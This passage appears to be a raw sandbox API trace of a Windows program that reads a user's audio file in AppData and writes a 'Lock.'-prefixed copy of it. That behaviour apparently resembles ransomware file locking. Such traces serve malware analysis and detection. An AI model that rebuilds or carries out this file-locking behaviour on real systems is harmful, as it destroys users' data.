0x2aa90b8 [0151.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0151.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0151.005] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/SROlf 2S5m.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\srolf 2s5m.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0151.005] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.005] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0151.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ea0 [0151.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0151.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0151.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0151.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0151.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0151.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.006] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0151.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0151.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0151.006] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0151.006] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0151.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0151.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0151.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0151.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0151.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0151.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0151.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0151.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0151.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0151.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0151.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0151.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0151.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0151.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0151.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0151.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0151.007] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0151.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0151.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0151.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0151.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0151.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0151.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0151.007] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.SROlf 2S5m.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.srolf 2s5m.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0151.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6ee0 [0151.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0151.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0151.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0151.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0151.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0151.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0151.008] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0151.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0151.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0151.008] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0151.008] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0151.008] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0151.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0151.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0151.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0151.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0151.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0151.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0151.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0151.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0151.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0151.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0151.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0151.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0151.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0151.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0151.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0151.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0151.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0151.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0151.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0151.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0151.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0151.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0151.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0151.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0151.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0151.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0151.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0151.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0151.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0151.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cde020 [0151.012] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0151.012] ReadFile (in: hFile=0x4f0, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0151.015] ReadFile (in: hFile=0x4f0, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x69ce, lpOverlapped=0x0) returned 1 [0151.015] ReadFile (in: hFile=0x4f0, lpBuffer=0x2a7a130, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0151.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0151.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0151.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0151.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0151.016] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x169ce) returned 0x2aaf410 [0151.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cde020 | out: hHeap=0x2af0000) returned 1 [0151.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0151.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0151.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0151.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0151.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0151.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0151.020] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0151.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0151.020] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x169ce) returned 0x2ac5de8 [0151.022] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0151.023] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0151.023] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0151.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0151.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0151.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0151.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0151.023] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x169ce) returned 0x2aaf410 [0151.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0151.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaf410 | out: hHeap=0x2af0000) returned 1 [0151.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0151.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0151.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0151.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0151.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0151.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0151.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0151.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0151.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0151.025] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0151.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0151.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ae8 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x169ce) returned 0x2aaf410 [0151.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0151.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a08 [0151.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0151.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0151.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0151.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71af8 [0151.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0151.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0151.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0151.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fd0 [0151.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0151.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0151.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0151.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0151.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0151.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0151.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0151.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x169ce) returned 0x37c0048 [0151.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0151.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0151.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0151.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0151.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0151.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0151.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0151.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0151.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0151.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0151.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0151.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0151.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0151.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0151.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0151.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0151.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0151.029] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0151.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0151.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0151.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0151.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cd8 [0151.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0151.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0151.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0151.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0151.031] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0151.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0151.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0151.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0151.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0151.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0151.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0151.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0151.031] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0151.031] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0151.032] RtlAllocateHeap (HeapHandle=0x2af0000, 